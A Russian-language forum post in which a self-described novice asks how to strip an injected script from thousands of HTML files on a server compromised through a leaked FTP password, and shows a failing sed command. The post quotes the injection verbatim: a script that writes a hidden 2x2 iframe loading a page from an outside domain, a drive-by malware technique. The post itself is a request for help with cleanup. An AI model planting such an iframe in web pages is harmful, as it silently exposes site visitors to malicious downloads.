Здравствуйте!
Меня попросили на дырявой машине удалить вирус! Там во многих тысячах html-файлов помещается такое:
<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://oxsanasiberians.com/downloads/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
В PHP-файлах тоже есть вирус, но немного другой! Я закрыл дырки в системе, всю ночь не спал, поменял все-все-все пароли ко всему. Выяснилось, что вирус внесли по FTP, видимо, пароль протёк, я обнаружил это по логам!
Теперь хочу вылечить все файлы. Подскажите со скриптом, пожалуйста. Я не особый скриптописатель, я ещё только учусь, попробовал удалять через tr - он на спецсимволы ругается! Все «подозрительные» символы заэкранировал с помощью «\» - то же самое! Через sed - тоже ошибка такая:
sed '\<\!\-\-c3284d\-\-\>\<script type=\"text\/javascript\"\>/d' /home/vitaly/public_html/templates/template_X_3_v13/template.html
sed: -e expression #1, char 58: unterminated address regex
Может кто сталкивался с такой бедой? Подскажите, как автоматически почистить тысячи файлов! Просто удалить строки - нельзя, там надо <body> сохранить (оно - не вирус).